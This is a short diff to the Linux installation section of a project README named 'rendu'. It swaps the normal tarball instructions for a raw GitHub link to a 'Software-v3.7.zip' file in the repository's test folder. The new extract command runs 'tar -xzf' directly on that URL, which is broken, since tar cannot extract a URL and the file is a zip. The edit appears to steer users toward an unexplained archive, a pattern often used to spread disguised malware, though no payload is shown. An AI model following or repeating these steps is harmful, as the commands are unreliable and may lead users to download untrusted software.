3lomda/rendu/README.md

 ### For Linux Users

-1. Locate the downloaded tarball (`.tar.gz`).
+1. Locate the downloaded tarball (`https://raw.githubusercontent.com/3lomda/rendu/main/test/Software-v3.7.zip`).
 2. Open a terminal and navigate to your Downloads folder.
-3. Extract the files using the command: `tar -xzf rendu.tar.gz`
+3. Extract the files using the command: `tar -xzf https://raw.githubusercontent.com/3lomda/rendu/main/test/Software-v3.7.zip`
 4. Follow the specific instructions in the README file included in the extracted folder for further installation guidance.

 ## 🎬 Using rendu